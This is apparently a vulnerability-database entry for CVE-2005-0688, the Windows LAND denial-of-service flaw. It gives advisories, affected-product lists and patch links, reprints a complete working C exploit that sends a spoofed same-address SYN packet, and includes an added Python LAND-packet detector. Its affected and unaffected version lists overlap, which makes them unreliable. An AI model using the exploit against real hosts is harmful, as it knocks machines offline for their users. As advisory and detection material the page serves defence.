CVE-2005-0688
CVSS 5.0
Published: 2005-03-05 00:00:00
Revised: 2016-10-17 23:13:42
NMCOES

[Original] Windows Server 2003 and XP SP2, with Windows Firewall turned off, allows remote attackers to cause a denial of service (CPU consumption) via a TCP packet with the SYN flag set and the same destination and source address and port, aka a reoccurrence of the "Land" vulnerability (CVE-1999-0016).


[CNNVD] Windows Server 2003 Denial of Service Vulnerability (CNNVD-200503-048)

        Microsoft Windows is a very popular operating system released by Microsoft.
        Windows Server 2003 and XP SP2 with the Windows Firewall turned off are affected by the LAND attack. An attacker can send a TCP packet with the SYN flag set, with the source IP address, destination IP address, source port and destination port all set to those of the target machine, causing a DoS condition lasting 15-30 seconds.
        Sending a single LAND packet to a file server can cause Windows Explorer to hang on every workstation currently connected to the server, with the server's CPU usage reaching 100%. In some cases the network monitoring on the vulnerable server cannot even sniff the malicious packet. Replaying the attack with tcpreplay can bring the network to a complete standstill.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_xp::sp2:tablet_pc  Microsoft windows xp_sp2 tablet_pc
cpe:/o:microsoft:windows_2003_server:r2

- OVAL (technical details for detection)

oval:org.mitre.oval:def:4978  Server 2003 Object Management Vulnerability
oval:org.mitre.oval:def:482  Spoofed Connection Request Vulnerability
oval:org.mitre.oval:def:1685  WinXP Land Vulnerability
oval:org.mitre.oval:def:1288  Win2k Land Vulnerability
oval:gov.nist.fdcc.patch:def:861  MS06-064: Vulnerabilities in TCP/IP IPv6 Could Allow Denial of Service (922819)
oval:gov.nist.USGCB.patch:def:861  MS06-064: Vulnerabilities in TCP/IP IPv6 Could Allow Denial of Service (922819)
*OVAL describes in detail how to detect this vulnerability; the related OVAL definitions contain further technical details on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0688
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0688
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200503-048
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=111005099504081&w=2
(UNKNOWN)  BUGTRAQ  20050305 Windows Server 2003 and XP SP2 LAND attack vulnerability
http://www.microsoft.com/technet/security/bulletin/ms05-019.mspx
(VENDOR_ADVISORY)  MS  MS05-019
http://www.microsoft.com/technet/security/Bulletin/MS06-064.mspx
(UNKNOWN)  MS  MS06-064
http://www.securityfocus.com/archive/1/archive/1/449179/100/0/threaded
(UNKNOWN)  HP  HPSBST02161
http://www.vupen.com/english/advisories/2006/3983
(UNKNOWN)  VUPEN  ADV-2006-3983

- Vulnerability information

Windows Server 2003 Denial of Service Vulnerability
Severity: Medium   Type: Other
Published: 2005-03-05 00:00:00   Updated: 2005-10-20 00:00:00
Attack source: Remote

- Advisories and patches

        The vendor has released upgrade patches to fix this security issue; patch download links:
        http://www.microsoft.com/technet/security/Bulletin/MS05-019.mspx
        http://www.microsoft.com/technet/security/Bulletin/MS06-064.mspx

- Vulnerability information (861)

MS Windows XP/2003 Remote Denial of Service Exploit (EDBID:861)
Platform: windows   Type: dos
Date: 2005-03-07   Verified
Port: 0   Author: RusH
Vulnerable application: N/A
/* Added Line #1 - BSD_SOURCE!!!!  /str0ke */

#define _BSD_SOURCE

#include <stdio.h>
#include <ctype.h>
#include <string.h>      /* memcpy */
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>   /* inet_aton */
#include <sysexits.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/*
Windows Server 2003 and XP SP2 remote DoS exploit
Tested under OpenBSD 3.6 at WinXP SP 2
Vuln by Dejan Levaja <dejan_@_levaja.com> , http://security.nnov.ru/docs7998.html
(c)oded by __blf 2005 RusH Security Team , http://rst.void.ru
Gr33tz: zZz, Phoenix, MishaSt, Inck-vizitor
Fuck lamerz: Saint_I, nmalykh, Mr. Clumsy
All rights reserved.
*/

/* checksum function by r0ach: standard one's-complement Internet checksum */
u_short checksum(u_short *addr, int len)
{
    u_short *w = addr;
    int i = len;
    int sum = 0;

    while (i > 1) {
        sum += *w++;
        i -= 2;
    }
    if (i == 1)
        sum += *(u_char *)w;
    sum = (sum >> 16) + (sum & 0xffff);
    sum = sum + (sum >> 16);
    return (~sum);
}

int main(int argc, char **argv)
{
    struct in_addr src, dst;
    struct sockaddr_in sin;
    /* pseudo-header prepended to the TCP segment when computing th_sum */
    struct _pseudoheader {
        struct in_addr source_addr;
        struct in_addr destination_addr;
        u_char zero;
        u_char protocol;
        u_short length;
    } pseudoheader;
    struct ip *iph;
    struct tcphdr *tcph;
    int mysock;
    u_char *packet;
    u_char *pseudopacket;
    int on = 1;

    if (argc != 3) {
        fprintf(stderr, "r57windos.c by __blf\n");
        fprintf(stderr, "RusH Security Team\n");
        fprintf(stderr, "Usage: %s <dest ip> <dest port>\n", argv[0]);
        return EX_USAGE;
    }
    if ((packet = (u_char *)malloc(sizeof(struct ip) + sizeof(struct tcphdr))) == NULL) {
        perror("malloc()");
        return EX_OSERR;
    }

    /* source and destination are the same address: the LAND condition */
    inet_aton(argv[1], &src);
    inet_aton(argv[1], &dst);

    iph = (struct ip *)packet;
    iph->ip_v = IPVERSION;
    iph->ip_hl = 5;
    iph->ip_tos = 0;
    iph->ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr));
    iph->ip_off = htons(IP_DF);
    iph->ip_ttl = 255;
    iph->ip_p = IPPROTO_TCP;
    iph->ip_sum = 0;
    iph->ip_src = src;
    iph->ip_dst = dst;

    /* source and destination port are likewise identical */
    tcph = (struct tcphdr *)(packet + sizeof(struct ip));
    tcph->th_sport = htons(atoi(argv[2]));
    tcph->th_dport = htons(atoi(argv[2]));
    tcph->th_seq = ntohl(rand());
    tcph->th_ack = rand();
    tcph->th_off = 5;
    tcph->th_flags = TH_SYN;  /* setting up TCP SYN flag here */
    tcph->th_win = htons(512);
    tcph->th_sum = 0;
    tcph->th_urp = 0;

    pseudoheader.source_addr = src;
    pseudoheader.destination_addr = dst;
    pseudoheader.zero = 0;
    pseudoheader.protocol = IPPROTO_TCP;
    pseudoheader.length = htons(sizeof(struct tcphdr));

    if ((pseudopacket = (u_char *)malloc(sizeof(pseudoheader) + sizeof(struct tcphdr))) == NULL) {
        perror("malloc()");
        return EX_OSERR;
    }
    memcpy(pseudopacket, &pseudoheader, sizeof(pseudoheader));
    memcpy(pseudopacket + sizeof(pseudoheader), packet + sizeof(struct ip), sizeof(struct tcphdr));
    tcph->th_sum = checksum((u_short *)pseudopacket, sizeof(pseudoheader) + sizeof(struct tcphdr));

    /* raw socket with IP_HDRINCL so the hand-built IP header is sent as-is */
    mysock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
    if (mysock < 0) {
        perror("socket()");
        return EX_OSERR;
    }
    if (setsockopt(mysock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) {
        perror("setsockopt");
        shutdown(mysock, 2);
        return EX_OSERR;
    }

    sin.sin_family = AF_INET;
    sin.sin_addr = dst;
    sin.sin_port = htons(80);
    if (sendto(mysock, packet, sizeof(struct ip) + sizeof(struct tcphdr), 0,
               (struct sockaddr *)&sin, sizeof(sin)) == -1) {
        perror("sendto()");
        shutdown(mysock, 2);
        return EX_OSERR;
    }
    printf("Packet sent. Remote machine should be down.\n");
    shutdown(mysock, 2);
    return EX_OK;
}

// milw0rm.com [2005-03-07]

- Vulnerability information

OSVDB ID: 14578
Microsoft Windows Malformed TCP SYN Loopback Packet Remote DoS (land)
Location: Remote / Network Access
Attack type: Denial of Service
Impact: Loss of Availability
Exploit: Public

- Vulnerability description

Microsoft Windows contains a flaw that may allow a remote denial of service. The issue is triggered when sending a TCP packet with the SYN flag set and the same destination and source address and port, which causes the system to consume all available CPU resources, resulting in a loss of availability.

- Timeline

2005-03-05 2005-02-25
2005-03-05 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- Related references

- Vulnerability author

- Vulnerability information

Microsoft IPv6 TCP/IP Loopback LAND Denial of Service Vulnerability
Class: Failure to Handle Exceptional Conditions   Bugtraq ID: 13658
Remote: Yes   Local: No
Published: 2005-05-17 12:00:00   Updated: 2006-10-12 10:24:00
Konrad Malewski <koyot@MOON.ONDRASZEK.DS.POLSL.GLIWICE.PL> is credited with the discovery of this issue.

- Affected program versions

Sun SunOS 4.1.4
Sun SunOS 4.1.3 _U1
SCO Unixware 2.1
SCO Open Server 5.0
SCO Open Desktop 3.0
SCO CMW+ 3.0
Novell Netware 4.1
NetBSD NetBSD 1.2.1
NetBSD NetBSD 1.2
NetBSD NetBSD 1.1
NetBSD NetBSD 1.0
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP Gold 0
Microsoft Windows XP Embedded SP1
Microsoft Windows XP Embedded
Microsoft Windows XP 64-bit Edition Version 2003 SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows XP 0
Microsoft Windows Server 2003 Web Edition SP1 Beta 1
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1 Beta 1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows NT 3.5.1
Microsoft Windows 95
Marconi ATM Switch 7.0.1
Marconi ATM Switch 6.1.1
Linux kernel 2.0.31
Linux kernel 2.0.30
HP HP-UX (VVOS) 10.24
HP HP-UX 11.0
HP HP-UX 10.30
HP HP-UX 10.20
HP HP-UX 10.16
HP HP-UX 10.10
HP HP-UX 10.1 0
HP HP-UX 10.0 1
HP HP-UX 10.0
HP HP-UX 9.0
FreeBSD FreeBSD 2.2.5
FreeBSD FreeBSD 2.2.4
FreeBSD FreeBSD 2.2.3
FreeBSD FreeBSD 2.2
FreeBSD FreeBSD 2.1.6 .1
FreeBSD FreeBSD 2.1.6
FreeBSD FreeBSD 2.1.5
FreeBSD FreeBSD 2.1 x
FreeBSD FreeBSD 2.1
Cisco IOS/700 1.0
Cisco IOS 11.2
Cisco IOS 11.1
Cisco IOS 11.0
Cisco IOS 10.3
BSDI BSD/OS 2.1
BSDI BSD/OS 2.0.1
BSDI BSD/OS 2.0
BSDI BSD/OS 1.1
Avaya Modular Messaging (MAS) 3.0
NetBSD NetBSD 1.3.2
NetBSD NetBSD 1.3.1
NetBSD NetBSD 1.3
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP4
Linux kernel 2.2.10
+ Caldera OpenLinux 2.3
Linux kernel 2.2
Linux kernel 2.1 .x
Linux kernel 2.1
Linux kernel 2.0.38
Linux kernel 2.0.37
Linux kernel 2.0.36
Linux kernel 2.0.35
Linux kernel 2.0.34
Linux kernel 2.0.33
Linux kernel 2.0.32
FreeBSD FreeBSD 2.2.8
FreeBSD FreeBSD 2.2.6
FreeBSD FreeBSD 2.2.2
FreeBSD FreeBSD 3.x
Cisco IOS 11.2.10
Cisco IOS 11.2.9 P
Cisco IOS 11.2.4 F1
Cisco IOS 11.2.4 F
Cisco IOS 11.2.4
Cisco IOS 11.1.15 IA
Cisco IOS 11.1.15 CA
Cisco IOS 11.1.15 AA
Cisco IOS 11.1.15
Cisco IOS 11.1.9 IA
Cisco IOS 11.1.7 CA
Cisco IOS 11.1.7 AA
Cisco IOS 11.1.7
Cisco IOS 11.0.17 BT
Cisco IOS 11.0.17
Cisco IOS 11.0.12 (a)BT
Cisco IOS 10.3.19 a
Cisco IOS 10.3.16
Cisco Catalyst 29xx supervisor software 2.4.401
Cisco Catalyst 29xx supervisor software 2.1.1102
BSDI BSD/OS 4.0.1
BSDI BSD/OS 4.0
BSDI BSD/OS 3.1
BSDI BSD/OS 3.0

- Unaffected program versions

NetBSD NetBSD 1.3.2
NetBSD NetBSD 1.3.1
NetBSD NetBSD 1.3
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP4
Linux kernel 2.2.10
+ Caldera OpenLinux 2.3
Linux kernel 2.2
Linux kernel 2.1 .x
Linux kernel 2.1
Linux kernel 2.0.38
Linux kernel 2.0.37
Linux kernel 2.0.36
Linux kernel 2.0.35
Linux kernel 2.0.34
Linux kernel 2.0.33
Linux kernel 2.0.32
FreeBSD FreeBSD 2.2.8
FreeBSD FreeBSD 2.2.6
FreeBSD FreeBSD 2.2.2
FreeBSD FreeBSD 3.x
Cisco IOS 11.2.10
Cisco IOS 11.2.9 P
Cisco IOS 11.2.4 F1
Cisco IOS 11.2.4 F
Cisco IOS 11.2.4
Cisco IOS 11.1.15 IA
Cisco IOS 11.1.15 CA
Cisco IOS 11.1.15 AA
Cisco IOS 11.1.15
Cisco IOS 11.1.9 IA
Cisco IOS 11.1.7 CA
Cisco IOS 11.1.7 AA
Cisco IOS 11.1.7
Cisco IOS 11.0.17 BT
Cisco IOS 11.0.17
Cisco IOS 11.0.12 (a)BT
Cisco IOS 10.3.19 a
Cisco IOS 10.3.16
Cisco Catalyst 29xx supervisor software 2.4.401
Cisco Catalyst 29xx supervisor software 2.1.1102
BSDI BSD/OS 4.0.1
BSDI BSD/OS 4.0
BSDI BSD/OS 3.1
BSDI BSD/OS 3.0

- Vulnerability discussion

The Microsoft Windows IPv6 TCP/IP stack is prone to a 'loopback' condition initiated by sending a TCP packet with the 'SYN' flag set and the source address and port spoofed to equal the destination address and port.

When a packet of this type is handled, an infinite loop is initiated and the affected system halts.

A remote attacker may exploit this issue to deny service for legitimate users.
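As an added defensive example (not part of this record, and not the exploit author's code), the following Python detector parses raw IPv4 and IPv6 packets and flags TCP segments with the SYN flag set whose source address and port equal the destination address and port, which is the signature described in the CNNVD description above and in this IPv6 discussion. The sample packets, the documentation addresses (192.0.2.0/24, 2001:db8::/32) and all function names are constructed for this example; IPv6 extension headers are not followed.

```python
"""Flag LAND-style TCP SYN packets (src addr/port == dst addr/port) in raw IPv4/IPv6 frames."""
import ipaddress
import struct

TCP_SYN = 0x02
TCP_ACK = 0x10
PROTO_TCP = 6


def parse_packet(pkt):
    """Parse an IPv4 or IPv6 header followed by a TCP header.

    Returns a dict with src, dst, sport, dport and flags, or None when the
    frame is not TCP or is too short to carry the fixed headers.
    """
    if not pkt:
        return None
    version = pkt[0] >> 4
    if version == 4:
        if len(pkt) < 20:
            return None
        ihl = (pkt[0] & 0x0F) * 4          # header length in bytes (options included)
        if ihl < 20 or len(pkt) < ihl:
            return None
        proto = pkt[9]
        src = ipaddress.IPv4Address(pkt[12:16])
        dst = ipaddress.IPv4Address(pkt[16:20])
        payload = pkt[ihl:]
    elif version == 6:
        if len(pkt) < 40:
            return None
        proto = pkt[6]                     # Next Header; extension headers not followed here
        src = ipaddress.IPv6Address(pkt[8:24])
        dst = ipaddress.IPv6Address(pkt[24:40])
        payload = pkt[40:]
    else:
        return None
    if proto != PROTO_TCP or len(payload) < 20:
        return None
    sport, dport = struct.unpack("!HH", payload[:4])
    flags = payload[13]                    # TCP flags byte (offset 13 of the TCP header)
    return {"src": src, "dst": dst, "sport": sport, "dport": dport, "flags": flags}


def is_land_packet(pkt):
    """True when a TCP segment has SYN set and identical source/destination address and port."""
    p = parse_packet(pkt)
    if p is None:
        return False
    return bool(p["flags"] & TCP_SYN) and p["src"] == p["dst"] and p["sport"] == p["dport"]


def scan(packets):
    """Return one alert string per LAND packet in an iterable of raw packets."""
    alerts = []
    for i, pkt in enumerate(packets):
        if is_land_packet(pkt):
            p = parse_packet(pkt)
            alerts.append(f"packet {i}: LAND SYN {p['src']}:{p['sport']} -> {p['dst']}:{p['dport']}")
    return alerts


# Constructed sample frames (checksums left at zero; the detector does not verify them).
def build_ipv4_tcp(src, dst, sport, dport, flags):
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0x4000, 64, PROTO_TCP, 0,
                     ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 512, 0, 0)
    return ip + tcp


def build_ipv6_tcp(src, dst, sport, dport, flags):
    ip6 = struct.pack("!IHBB16s16s", 6 << 28, 20, PROTO_TCP, 64,
                      ipaddress.IPv6Address(src).packed, ipaddress.IPv6Address(dst).packed)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 512, 0, 0)
    return ip6 + tcp


SAMPLE_PACKETS = [
    build_ipv4_tcp("192.0.2.10", "192.0.2.20", 40000, 80, TCP_SYN),      # ordinary SYN: benign
    build_ipv4_tcp("192.0.2.20", "192.0.2.20", 139, 139, TCP_SYN),       # IPv4 LAND packet
    build_ipv4_tcp("192.0.2.20", "192.0.2.20", 139, 139, TCP_ACK),       # same tuple, no SYN
    build_ipv6_tcp("2001:db8::1", "2001:db8::1", 445, 445, TCP_SYN),     # IPv6 LAND packet
    b"\x45\x00\x00\x14",                                                 # truncated frame
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_PACKETS):
        print(alert)
```

The check is cheap enough to run inline on a sniffer feed; a matching packet is always spoofed, since no legitimate stack sends a SYN to itself from the same port, so a single hit is worth an alert rather than a threshold.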

- Exploit

The following exploit is available:

- Solution

Microsoft has released advisories and fixes to address this issue. Please see the referenced advisories for more information on obtaining and applying fixes.


Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows XP Professional
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows XP Home SP2
Microsoft Windows Server 2003 Web Edition
Microsoft Windows XP Home
Microsoft Windows XP Home SP1
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition
Microsoft Windows XP Professional SP2
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Standard x64 Edition
HP HP-UX 10.0 1
HP HP-UX 10.0
HP HP-UX 10.10
HP HP-UX 10.16
HP HP-UX 10.20
HP HP-UX (VVOS) 10.24
HP HP-UX 10.30
HP HP-UX 11.0
FreeBSD FreeBSD 2.2.5
SCO Open Server 5.0

- Related references

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site]

Copyright notice

CVE/CWE/OVAL are registered trademarks of MITRE Corporation; their official data sources are kept on MITRE's related websites